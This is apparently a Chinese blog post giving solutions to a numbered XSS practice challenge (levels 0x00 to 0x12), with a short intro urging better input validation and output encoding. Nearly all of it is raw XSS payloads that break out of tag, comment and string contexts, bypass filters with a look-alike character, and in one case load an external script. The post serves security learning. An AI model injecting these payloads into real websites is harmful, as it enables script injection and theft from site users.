本文列举了多种XSS跨站脚本攻击的实例,包括不同编码方式下的注入尝试,如`<script>`, `onerror`, `img`标签的`onerror`属性等。这些实例展示了攻击者如何利用HTML和JavaScript来执行恶意脚本,提醒读者关注网站安全性,加强输入验证和输出编码,防止XSS攻击。
目录
0x00
<script> alert(1)</script>0x01
</textarea><script>alert(1)</script>0x02
"><script>alert(1)</script>0x03
<script>alert`1`</script>0x04
<svg><script>alert(1)</script>0x05
--!><script>alert(1)</script>0x06
onclick
=alert(1)0x07
<input type=button onclick="alert(1)"0x08
</style
>
<script>alert(1)</script>0x09
https://www.segmentfault.com/" onerror=alert(1)>0x0a
暂无不借助服务器其它解法0x0b
<img src=q onerror=alert(1)>0x0c
<img src=q onerror=alert(1)>0x0d
alert(1)
-->0x0e
<ſcript src="https://xss.haozi.me/j.js"></script>0x0f
');alert('10x10
alert('1')0x11
");alert("10x12
\");alert(1)//
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
